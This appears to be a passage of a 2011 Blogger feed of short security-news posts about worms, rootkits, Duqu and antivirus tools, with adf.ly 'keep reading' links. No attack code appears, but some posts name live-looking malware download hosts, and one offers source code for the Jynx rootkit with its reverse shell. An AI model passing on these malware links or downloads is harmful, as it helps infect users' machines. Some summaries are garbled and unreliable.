href="http://www.thatcoin.com/2011/11/zeuz-links/"&gt;Worm Zeuz&lt;/a&gt; re-emerged in the form of links. JPG. Spread through the social networking site Facebook.&lt;br /&gt;The message such a link Screensaver, when it is opened it will ask to download other files from http://www.offi sense.co.il / lang / b.exe. Then copy the file will go into the user’s system [% username% profile] &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thatcoin.com/2011/11/zeuz-links/"&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1887606053347678007?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1887606053347678007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1887606053347678007'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/worm-zeuz-re-emerged-in-form-of-links.html' title='Worm Zeuz re-emerged in the form of links'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5546410958748686237</id><published>2011-12-03T03:55:00.000+07:00</published><updated>2011-12-03T03:55:41.435+07:00</updated><title type='text'>CEHv7</title><content type='html'>CEHv7 provides a comprehensive ethical hacking and network security-training program to meet the standards of highly skilled &lt;a href="http://www.thatcoin.com/?s=security&amp;search=Search"&gt;security&lt;/a&gt; professionals. Hundreds of SMEs and authors have contributed towards the content presented in the CEHv7 courseware. Latest tools and exploits uncovered from the underground community are featured in the new package.&lt;br /&gt;&lt;a href="http://adf.ly/3uOrC"&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5546410958748686237?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5546410958748686237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5546410958748686237'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/12/cehv7.html' title='CEHv7'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-633531311749438274</id><published>2011-11-28T16:52:00.002+07:00</published><updated>2011-11-28T16:52:56.021+07:00</updated><title type='text'>Detecting bugs and vulnerabilities in Linux</title><content type='html'>Australian researcher Silvio Cesare, PhD student at Deakin University has released a tool capable of automatically detecting bugs and vulnerabilities in embedded Linux libraries. Developers may “embed” or “clone” code from 3rd party projects. This can be either statically link against external library or maintaining an internal copy of a library’s source or fork a copy of a library’s source.&lt;br /&gt;The Approach of this tools is that if a source package has the other package’s filenames as a subset, it is embedded, Packages that share files are related. A graph of relationships has related packages as cliques. Graph Theory is used to perform the analysis.&lt;br /&gt;&lt;br /&gt;Linux vendors have previously used laborious manual techniques to find holes in libraries. Debian alone manually tracks some 420 embedded packages, Cesare said at Ruxcon 2011. Silvio’s tool also automates identifying if embedded packages have outstanding vulnerabilities that have not been patched. Using this system, over 30 previously unknown vulnerabilities were identified in Linux distributions.&lt;br /&gt;&lt;a href="http://adf.ly/3uOjJ"&gt;&lt;br /&gt;Keep reading &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-633531311749438274?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/633531311749438274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/633531311749438274'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/11/detecting-bugs-and-vulnerabilities-in.html' title='Detecting bugs and vulnerabilities in Linux'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3032151336257944149</id><published>2011-11-13T20:33:00.000+07:00</published><updated>2011-11-13T20:33:16.677+07:00</updated><title type='text'>CrySyS Duqu Detector Open source Toolkit Released</title><content type='html'>Two weeks ago Researchers at the Laboratory of Cryptography and System Security (CrySyS) in Hungary confirmed the existence of the zero-day vulnerability in the Windows kernel, according to security researchers tracking the Stuxnet-like cyber-surveillance Trojan.&lt;br /&gt;&lt;br /&gt;The Laboratory of Cryptography and System Security (CrySyS) has released an open-source toolkit that can find traces of Duqu infections on computer networks.The open-source toolkit, from the Laboratory of Cryptography and System Security (CrySyS), contains signature- and heuristics-based methods that can find traces of Duqu infections where components of the malware are already removed from the system.&lt;br /&gt;&lt;br /&gt;They make a release that "The toolkit contains signature and heuristics based methods and it is able to find traces of infections where components of the malware are already removed from the system.The intention behind the tools is to find different types of anomalies (e.g., suspicious files) and known indicators of the presence of Duqu on the analyzed computer. As other anomaly detection tools, it is possible that it generates false positives. Therefore, professional personnel is needed to elaborate the resulting log files of the tool and decide about further steps."&lt;br /&gt;&lt;br /&gt;This toolkit contains very simple, easy-to-analyze program source code, thus it may also be used in special environments, e.g. in critical infrastructures, after inspection of the source code (to check that there is no backdoor or malicious code inside) and recompiling.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.crysys.hu/duqudetector-files/files/duqudetector-v1_01.zip" target="_blank"&gt;Download Duqu Detector&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; &lt;a href="http://thehackernews.com"&gt;TheHackerNews.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3032151336257944149?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3032151336257944149'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3032151336257944149'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/11/crysys-duqu-detector-open-source.html' title='CrySyS Duqu Detector Open source Toolkit Released'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2345375684240224242</id><published>2011-11-09T12:28:00.000+07:00</published><updated>2011-11-09T12:28:51.161+07:00</updated><title type='text'>Microsoft Patch Exploit Duqu Malware</title><content type='html'>Microsoft issued fixes for Windows Fix Kb Duqu 2639658 from malware attacks.&lt;br /&gt;&lt;br /&gt;Malware exploit weaknesses in the Windows system TrueType WIN32K engine. If entered into the computer as there are programs that inadvertently infected Duqu. &lt;a href="http://www.thatcoin.com/2011/11/microsoft-patch-exploit-duqu-malware/" target="_blank"&gt;Dugu malware&lt;/a&gt; can change the data, create new accounts with full privileges.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/3d8Y5"&gt;Keep reading and download the malware patch&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2345375684240224242?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2345375684240224242'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2345375684240224242'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/11/microsoft-patch-exploit-duqu-malware.html' title='Microsoft Patch Exploit Duqu Malware'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6618771558553072927</id><published>2011-11-04T18:59:00.000+07:00</published><updated>2011-11-04T18:59:39.097+07:00</updated><title type='text'>Beware Gadhafi Worm</title><content type='html'>The obituary Moamar Gadhafi made ​​the arena for distributing malware. Similar to when Osama bin Laden is dead, Internet criminals take a chance with a hot topic for the spread of malicious programs.&lt;br /&gt;&lt;br /&gt;Antivirus company Sophos found Moamar obituaries via email inadvertently infiltrated the Internet &lt;a href="http://www.thatcoin.com/2011/10/gadhafi-worm/"&gt;worm&lt;/a&gt; or worm software. The name of the malicious files found with the name Bloody Photos_Gadhafi_Death \ Gadhafi? Rar.scr made ​​as if to is the file containing the image compression.&lt;br /&gt;&lt;br /&gt;Fill complete message from the email worm: &lt;a href="http://www.thatcoin.com/2011/10/gadhafi-worm/"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/10/gadhafi-worm/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6618771558553072927?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6618771558553072927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6618771558553072927'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/11/beware-gadhafi-worm.html' title='Beware Gadhafi Worm'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-548649802774063722</id><published>2011-10-25T14:32:00.001+07:00</published><updated>2011-10-25T14:33:03.799+07:00</updated><title type='text'>Web Programming</title><content type='html'>In making the web, then you will not regardless of what programming language name. Programming language is a technique of command / instruction standards to govern the computer.&lt;br /&gt;Here is an explanation of any &lt;a href="http://www.thatcoin.com/2011/10/web-programming-languages/"&gt;programming language used to create a website&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;HTML Programming Languages&lt;br /&gt;&lt;br /&gt;HyperText Markup Language (HTML) is a markup language used to create a web page and displays various information in an Internet browser.&lt;br /&gt;HTML is now an Internet standard defined and controlled use by the World Wide Web Consortium (W3C).&lt;br /&gt;HTML form tag code that instructs the browser to produce a display according to the desired.&lt;br /&gt;A file is an HTML file can be opened by using a web browser such as Mozilla Firefox or Microsoft Internet Explorer.&lt;br /&gt;&lt;br /&gt;PHP Programming Language&lt;br /&gt;&lt;br /&gt;PHP is a scripting programming language most widely used today.&lt;br /&gt;PHP was first created by Rasmus Lerdorf in 1995. At that time, PHP was named FI (Form Interpreted), which is his form of a set of scripts used to process the form data from the web.&lt;br /&gt;PHP is widely used to create dynamic web sites, although it was likely used for other usage.&lt;br /&gt;PHP generally runs on the Linux operating system (PHP can also be run with Windows hosting). &lt;a href="http://www.thatcoin.com/2011/10/web-programming-languages/"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/10/web-programming-languages/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-548649802774063722?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/548649802774063722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/548649802774063722'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/in-making-web-then-you-will-not.html' title='Web Programming'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1106859464810987257</id><published>2011-10-23T23:22:00.001+07:00</published><updated>2011-10-23T23:23:12.946+07:00</updated><title type='text'>The Shellcoder Handbook</title><content type='html'>This much-anticipated revision, written by the ultimate group of top security experts in the world, features 40 percent new content on how to find security holes in any operating system or application&lt;br /&gt;New material addresses the many new exploitation techniques that have been discovered since the first edition, including attacking "unbreakable" software packages such as McAfee's Entercept, Mac OS X, XP, Office 2003, and Vista&lt;br /&gt;Also features the first-ever published information on exploiting Cisco's IOS, with content that has never before been explored&lt;br /&gt;The companion Web site features downloadable code files&lt;br /&gt;The black hats have kept up with security enhancements. Have you?&lt;br /&gt;In the technological arena, three years is a lifetime. Since the first edition of this book was published in 2004, built-in security measures on compilers and operating systems have become commonplace, but are still far from perfect. Arbitrary-code execution vulnerabilities still allow attackers to run code of their choice on your system—with disastrous results.&lt;br /&gt;In a nutshell, this book is about code and data and what happens when the two become confused. You'll work with the basic building blocks of security bugs—assembler, source code, the stack, the heap, and so on. You'll experiment, explore, and understand the systems you're running and how to better protect them.&lt;br /&gt;Become familiar with security holes in Windows, Linux, Solaris, Mac OS X, and Cisco's IOS&lt;br /&gt;Learn how to write customized tools to protect your systems, not just how to use ready-made ones&lt;br /&gt;Use a working exploit to verify your assessment when auditing a network&lt;br /&gt;Use proof-of-concept exploits to rate the significance of bugs in software you're developing&lt;br /&gt;Assess the quality of purchased security products by performing penetration tests based on the information in this book&lt;br /&gt;Understand how bugs are found and how exploits work at the lowest level&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/3JYjv" target="_blank"&gt;Download The Shellcoder Handbook&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rupeshhacktheworld.blogspot.com" target="_blank"&gt;source&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1106859464810987257?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1106859464810987257'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1106859464810987257'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/shellcoder-handbook.html' title='The Shellcoder Handbook'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5775049098489379873</id><published>2011-10-19T20:21:00.000+07:00</published><updated>2011-10-19T20:21:00.251+07:00</updated><title type='text'>Beware Jynx Rootkit</title><content type='html'>Jynx Kit is a LD_PRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LD_PRELOAD rootkits.&lt;br /&gt;&lt;br /&gt;Download the source code,&lt;a href="http://adf.ly/3HCSZ" target="_blank"&gt; here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://thehackernews.com/2011/10/jynx-kit-ldpreload-userland-rootkit.html" target="_blank"&gt;Source&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5775049098489379873?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5775049098489379873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5775049098489379873'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/beware-jynx-rootkit.html' title='Beware Jynx Rootkit'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3696071999449018675</id><published>2011-10-13T23:00:00.000+07:00</published><updated>2011-10-13T23:00:26.487+07:00</updated><title type='text'>IE Cookiejacking</title><content type='html'>Computer security researchers found a cookie file that can steal important data from the contents of the computer. Recently discovered in Internet Explorer software.&lt;br /&gt;Cookiejacking could open up important data from Facebook, Twitter and Gmail, or other data from the service on the internet. But Microsoft has not committed when the importance of this attack. A little knowledge about the function of the software cookie file of your browser.&lt;br /&gt;&lt;br /&gt;What is a Cookie. A file containing the small data created by the application or browser software. Cookie files store information from the site and account data sites.&lt;br /&gt;&lt;br /&gt;What is Cookiejacking. A technique to break through and pass through the sieve of the Internet Explorer security. So the attack can take data in IE cookies that should not be read or taken by someone else.&lt;br /&gt;&lt;br /&gt;What are the risks. Cookies are recorded in the file by the browser software as the data is less valuable. But if you go to a site Facebook, Google and Gmail. Your account data is in the Cookie. If the computer has been infected Cookiejacking, then your data could be stolen.&lt;br /&gt;&lt;a href="http://adf.ly/39Pso"&gt;&lt;br /&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3696071999449018675?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3696071999449018675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3696071999449018675'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/ie-cookiejacking.html' title='IE Cookiejacking'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-6597898349144769129</id><published>2011-10-11T00:22:00.000+07:00</published><updated>2011-10-11T00:22:27.585+07:00</updated><title type='text'>Malware Mobile Attacks</title><content type='html'>The amount of malware that attack mobile devices increased by 273 percent since the same period last year. Malware can infect many operating systems, is the type most commonly found today.&lt;br /&gt;A lot of malware is designed to make spamming, or sending an SMS without the permission of the owner’s&lt;br /&gt;&lt;br /&gt;the perpetrators of most still use the backdoor, spy programs and SMS service to attack their victims. Currently we see much potential risk for mobile devices and users. cybercrime trends by using malware for mobile will continue. &lt;a href="http://adf.ly/38RqE"&gt;Keep reading&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://www.thatcoin.com/2011/10/beware-mobile-malware/"&gt;Thatcoin.com&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-6597898349144769129?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6597898349144769129'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/6597898349144769129'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/malware-mobile-attacks.html' title='Malware Mobile Attacks'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-810436661105628700</id><published>2011-10-02T01:50:00.000+07:00</published><updated>2011-10-02T01:50:00.554+07:00</updated><title type='text'>iScanner Detect and Remove Malicious Codes Tools</title><content type='html'>iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files.&lt;br /&gt;&lt;br /&gt;Current Features:&lt;br /&gt;Ability to scan one file, directory or remote web page / website.&lt;br /&gt;Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares.Extensive log shows the infected files and the malicious code.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://adf.ly/2zPwD"&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-810436661105628700?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/810436661105628700'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/810436661105628700'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/10/iscanner-detect-and-remove-malicious.html' title='iScanner Detect and Remove Malicious Codes Tools'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3937003735292240409</id><published>2011-09-29T16:49:00.000+07:00</published><updated>2011-09-29T16:49:03.901+07:00</updated><title type='text'>How to use Facebook</title><content type='html'>Facebook users are easy prey for criminals along with the number of people share information. Every day people put themselves at risk by clicking on an imprudent to invitations sent by friends to join the group or write in their walls.&lt;br /&gt;Think about what you add.&lt;br /&gt;Receiving a request provided by a new friend asks posting, photo messaging and information about your personal background. Watch your friends list and think back to who is entitled to access your personal stuff.&lt;br /&gt;Check the privacy settings. Facebook recently did the update, set the privacy from scratch can be very meaningful. &lt;a href="http://j.gs/LRY "&gt;Keep reading&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-3937003735292240409?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3937003735292240409'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/3937003735292240409'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/how-to-use-facebook.html' title='How to use Facebook'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2289802859422262431</id><published>2011-09-27T13:08:00.000+07:00</published><updated>2011-09-27T13:08:13.698+07:00</updated><title type='text'>Rootkit.Win32.TDSS Virus</title><content type='html'>Rootkit.Win32.TDSS virus can invade for all Windows, including the 64 bit XP system to Windows 7. The new virus TDL4 indelible even detected. Sometimes the use of processors to 100 percent and run the application Conhost.exe with certain parameters.&lt;br /&gt;&lt;br /&gt;If time can be downloaded below to check the computer, the File is only 1.3MB.&lt;br /&gt;&lt;br /&gt;Source-x page :&lt;br /&gt;IMPORTANT&lt;br /&gt;• The utility has GUI.&lt;br /&gt;• The utility supports 32-bit and 64-bit operation systems.&lt;br /&gt;• The utility can be run in Normal Mode and Safe Mode.&lt;br /&gt;Disinfection of an infected system&lt;br /&gt;• Download the file &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.zip" target="_blank"&gt;TDSSKiller.zip&lt;/a&gt; and extract it (use archiver, for example, WInZip) into a folder on the infected (or potentially infected) PC.&lt;br /&gt;• Execute the file &lt;a href="http://support.kaspersky.com/downloads/utils/tdsskiller.exe" target="_blank"&gt;TDSSKiller.exe&lt;/a&gt;. &lt;br /&gt;• Wait for the scan and disinfection process to be over. It is necessary to reboot the PC after the disinfection is over.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2289802859422262431?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2289802859422262431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2289802859422262431'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/rootkitwin32tdss-virus.html' title='Rootkit.Win32.TDSS Virus'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2927829962323394425</id><published>2011-09-23T14:32:00.001+07:00</published><updated>2011-09-23T14:44:56.504+07:00</updated><title type='text'>Website Infected With Spams</title><content type='html'>The attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised. These sites supposed to be compromised. Most of the &lt;a href="http://adf.ly/2rCvk"&gt;hacked sites&lt;/a&gt; had outdated versions of WordPress installed&lt;br /&gt;&lt;br /&gt;[ &lt;a href="http://thehackernews.com/2011/09/50000-wordpress-sites-infected-with.html" target="_blank"&gt;TheHackerNews&lt;/a&gt; ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2927829962323394425?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2927829962323394425'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2927829962323394425'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/website-infected-with-spams.html' title='Website Infected With Spams'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-7383377017711493796</id><published>2011-09-20T16:23:00.000+07:00</published><updated>2011-09-20T16:23:48.858+07:00</updated><title type='text'>BIOS Mebromi Trojan</title><content type='html'>China 360 antivirus companies discovered a unique virus that attacks the three computer systems, either the BIOS, boot sector and Windows systems. This technique makes it difficult to remove viruses Mebromi BMW, although the hard drive is formatted or replaced.&lt;br /&gt;&lt;br /&gt;BMW stands for BIOS, masterboot and Windows.&lt;br /&gt;&lt;br /&gt;attack techniques&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Get into the BIOS to protect the other viruses that exist on the MBR will be attacked again when removed.&lt;br /&gt;Winlogon.exe infects the MBR on duty in Windows XP/2003 or Winnt.exe for Windows 2000. When you are attacked, the other is tasked to download a rootkit&lt;br /&gt;Characterize the virus Mebromi&lt;br /&gt;&lt;br /&gt;When Windows starts will appear in the "Find it OK!"&lt;br /&gt;Antivirus software will find and remove the message "Hard disk boot sector virus" but it can not be deleted.&lt;br /&gt;The virus will redirect the browser to the address http://10554.new93.com/index.htm "&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The company issued a software antivirus to stop viruses via BMW, &lt;a href="http://bbs.360.cn/4005462/251088932.html" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The first file can be downloaded, &lt;a href="http://down.360safe.com/MBRImmunity.zip" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The second file to turn off the virus via the 360 system and for first aid kit, &lt;a href="http://down.360safe.com/360compkill5.0.zip" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-7383377017711493796?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7383377017711493796'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/7383377017711493796'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2011/09/bios-mebromi-trojan.html' title='BIOS Mebromi Trojan'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-7476724030972491726</id><published>2011-09-14T18:59:00.000+07:00</published><updated>2011-09-14T18:59:26.292+07:00</updated><title type='text'>The Kaspersky Virus 